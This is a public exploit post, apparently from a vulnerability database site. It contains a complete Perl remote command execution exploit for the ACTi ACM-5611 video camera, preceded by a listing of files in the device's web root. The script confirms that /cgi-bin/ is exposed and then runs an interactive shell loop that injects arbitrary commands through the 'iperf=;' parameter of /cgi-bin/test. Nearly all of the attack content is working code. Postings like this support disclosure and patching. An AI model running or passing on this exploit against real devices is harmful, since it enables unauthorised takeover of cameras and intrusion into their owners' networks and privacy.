/var/www/cgi-bin/macdev # # [ /var/www/cgi-bin/system # # [ /var/www/cgi-bin/mpeg4 # # [ /var/www/cgi-bin/test # # [ /var/www/cgi-bin/encoder # # [ /var/www/cgi-bin/web1.cgi # # [ /var/www/default.css # # [ /var/www/index.htm # # [ /var/www/profile/cze.bin # # [ /var/www/profile/dan.bin # # [ /var/www/profile/eng.bin # # [ /var/www/profile/fin.bin # # [ /var/www/profile/fre.bin # # [ /var/www/profile/ger.bin # # [ /var/www/profile/hun.bin # # [ /var/www/profile/ita.bin # # [ /var/www/profile/jap.bin # # [ /var/www/profile/lang_table.bin # # [ /var/www/profile/por.bin # # [ /var/www/profile/sch.bin # # [ /var/www/profile/spa.bin # # [ /var/www/profile/tch.bin # # [ /var/www/nvEPLMedia.ocx # # [ /var/www/pid # # [ # # # use strict; use HTTP::Request; use LWP::UserAgent; use WWW::UserAgent::Random; use HTML::TreeBuilder; $| = 1; print "\033[2J"; #clear the screen print "\033[0;0H"; #jump to 0,0 print "[ ACTi ACM-5611 Video Camera Remote Command Execution Exploit [ ============================================================ [ Exploit Author: Todor Donev 2019 <todor.donev\@gmail.com> "; if(not defined $ARGV[0]) { print "[ Usage: perl $0 [target]\n"; print "[ Example: perl $0 192.168.1.1\n\n"; exit; } my $host = $ARGV[0] =~ /^http:\/\// ? $ARGV[0]: 'http://' . $ARGV[0]; my $user_agent = rand_ua("browsers"); my $browser = LWP::UserAgent->new(); $browser->timeout(10); $browser->agent($user_agent); my $target = $host."/cgi-bin/"; my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]); my $response = $browser->request($request); print "[ 401 Unauthorized!\n" and exit if ($response->code eq '401'); if (defined ($response->as_string()) && ($response->as_string() =~ m/<H2>Index of \/cgi-bin\/<\/H2>/)){ print "[ Server: ", $response->header('Server'), "\n"; print "[ The target is vulnerable\n"; print "[\n[ Directory Traversal\n"; my $tree = HTML::TreeBuilder->new_from_content($response->as_string()); my @files = $tree->look_down(_tag => 'a'); print "[ ", $host.$_->attr('href'), "\n" for @files; print "[\n[ Got root?\n"; while(1){ my $cmd; print "[ \# "; chomp($cmd = <STDIN>); if($cmd eq "clear"){system $^O eq 'MSWin32' ? 'cls' : 'clear';} exit if $cmd eq 'exit'; my $target = $host."/cgi-bin/test?iperf=;".$cmd; my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]); my $response = $browser->request($request) or die "[ Exploit Failed: $!"; print "[ ", $_, "\n" for split(/\n/,$response->content()); } } else { print "[ Exploit failed! The target isn't vulnerable\n"; exit; }


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top